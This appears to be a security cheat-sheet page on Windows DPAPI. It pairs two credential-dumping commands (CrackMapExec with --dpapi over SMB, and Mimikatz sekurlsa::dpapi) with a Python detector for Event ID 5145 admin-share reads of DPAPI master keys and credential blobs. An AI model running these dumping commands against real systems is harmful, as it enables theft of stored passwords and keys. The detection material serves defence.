Data Protection API (DPAPI)

DPAPI (Data Protection Application Programming Interface) is a Windows operating system feature that provides data protection by encrypting sensitive data using a user's login credentials. DPAPI is used by various applications to protect sensitive information such as passwords, keys, and credentials.

If an attacker gains access to a user's login credentials, they can use DPAPI to decrypt the protected data. Therefore, DPAPI is a valuable target for attackers looking to gain access to sensitive information.

```
# Dumping DPAPI with CrackMapExec
## Requires Local Administrator privileges
crackmapexec smb $ip -u $user -p $password --dpapi

# Dumping DPAPI with Mimikatz
sekurlsa::dpapi
```
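
A defender-side check for the remote collection shown above, as an added example that is not part of the original page: it scans Windows Security Event ID 5145 (detailed file share access) records for access to DPAPI master-key and credential paths over an administrative share. It assumes the "Detailed File Share" audit subcategory is enabled and that remote collection reaches these files over a drive admin share; the `ev` helper, events, accounts and addresses are constructed for illustration.

```python
import re
from collections import defaultdict

# Per-user DPAPI material: master keys under ...\Microsoft\Protect\<SID>\,
# protected blobs under ...\Microsoft\Credentials and ...\Microsoft\Vault.
DPAPI_PATH = re.compile(
    r"^Users\\([^\\]+)\\AppData\\(?:Roaming|Local)\\Microsoft\\"
    r"(Protect|Credentials|Vault)(?:\\|$)", re.IGNORECASE)
ADMIN_SHARE = re.compile(r"^\\\\\*\\[A-Z]\$$", re.IGNORECASE)  # e.g. \\*\C$

def ev(ip, user, share, path):
    """Hypothetical helper: build a 5145 record with the fields this check reads."""
    return {"EventID": 5145, "IpAddress": ip, "SubjectUserName": user,
            "ShareName": share, "RelativeTargetName": path}

# Constructed sample events, not real telemetry.
SAMPLE_EVENTS = [
    ev("192.0.2.50", "localadm", r"\\*\C$",
       r"Users\alice\AppData\Roaming\Microsoft\Protect\S-1-5-21-1-2-3-1001\0f1e2d3c-0000-4000-8000-000000000001"),
    ev("192.0.2.50", "localadm", r"\\*\C$",
       r"Users\alice\AppData\Local\Microsoft\Credentials\CONSTRUCTEDBLOB01"),
    ev("192.0.2.50", "localadm", r"\\*\C$",
       r"Users\bob\AppData\Roaming\Microsoft\Protect\S-1-5-21-1-2-3-1002\Preferred"),
    ev("192.0.2.77", "backupsvc", r"\\*\C$", r"Users\alice\Documents\report.docx"),
    ev("192.0.2.77", "backupsvc", r"\\*\IPC$", r"srvsvc"),
]

def find_remote_dpapi_reads(events):
    """Return one alert per (source IP, account) that touched DPAPI paths over an admin share."""
    seen = defaultdict(lambda: {"profiles": set(), "kinds": set()})
    for e in events:
        if e.get("EventID") != 5145 or not ADMIN_SHARE.match(e.get("ShareName", "")):
            continue
        m = DPAPI_PATH.match(e.get("RelativeTargetName", ""))
        if m:
            entry = seen[(e["IpAddress"], e["SubjectUserName"])]
            entry["profiles"].add(m.group(1).lower())
            entry["kinds"].add(m.group(2).capitalize())
    alerts = []
    for (ip, user), entry in sorted(seen.items()):
        # Master keys plus blobs, or several profiles, from one source is
        # what bulk collection looks like; a single hit is lower confidence.
        bulk = (("Protect" in entry["kinds"] and len(entry["kinds"]) > 1)
                or len(entry["profiles"]) > 1)
        alerts.append({"source": ip, "account": user,
                       "profiles": sorted(entry["profiles"]),
                       "kinds": sorted(entry["kinds"]),
                       "severity": "high" if bulk else "medium"})
    return alerts
```

Legitimate profile backups over `C$` can touch the same paths, so baseline known backup accounts and hosts before alerting on this.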

References

{% embed url="https://docs.google.com/viewerng/viewer?url=https://www.synacktiv.com/ressources/univershell_2017_dpapi.pdf" %}